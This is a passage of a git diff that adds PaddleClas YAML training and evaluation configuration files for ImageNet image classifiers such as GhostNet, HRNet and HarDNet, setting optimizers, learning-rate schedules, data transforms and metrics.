image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - 
DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 632 + - CropImage: + size: 600 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/GhostNet/GhostNet_x0_5.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/GhostNet/GhostNet_x0_5.yaml new file mode 100644 index 0000000..ecf64c0 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/GhostNet/GhostNet_x0_5.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: GhostNet_x0_5 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.8 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00004 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: 
ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/GhostNet/GhostNet_x1_0.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/GhostNet/GhostNet_x1_0.yaml new file mode 100644 index 0000000..613aef8 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/GhostNet/GhostNet_x1_0.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + 
eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: GhostNet_x1_0 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.8 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00004 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - 
ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/GhostNet/GhostNet_x1_3.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/GhostNet/GhostNet_x1_3.yaml new file mode 100644 index 0000000..d1d40e0 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/GhostNet/GhostNet_x1_3.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: GhostNet_x1_3 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.8 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00004 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + 
channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W18_C.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W18_C.yaml new file mode 100644 index 0000000..05b4353 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W18_C.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: HRNet_W18_C + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + 
image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W30_C.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W30_C.yaml new file mode 100644 index 0000000..1e80d09 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W30_C.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + 
eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: HRNet_W30_C + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' 
+ - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W32_C.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W32_C.yaml new file mode 100644 index 0000000..8d8cc6c --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W32_C.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: HRNet_W32_C + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: 
+ to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W40_C.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W40_C.yaml new file mode 100644 index 0000000..6224a2c --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W40_C.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: HRNet_W40_C + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: 
ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W44_C.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W44_C.yaml new file mode 100644 index 0000000..cef9845 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W44_C.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + 
eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: HRNet_W44_C + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 
0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W48_C.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W48_C.yaml new file mode 100644 index 0000000..0969104 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W48_C.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: HRNet_W48_C + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + 
transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W64_C.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W64_C.yaml new file mode 100644 index 0000000..557c1f5 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W64_C.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: HRNet_W64_C + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval 
+DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/HarDNet/HarDNet39_ds.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HarDNet/HarDNet39_ds.yaml new file mode 100644 index 0000000..ac21d5e --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HarDNet/HarDNet39_ds.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ 
+ device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: HarDNet39_ds + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + 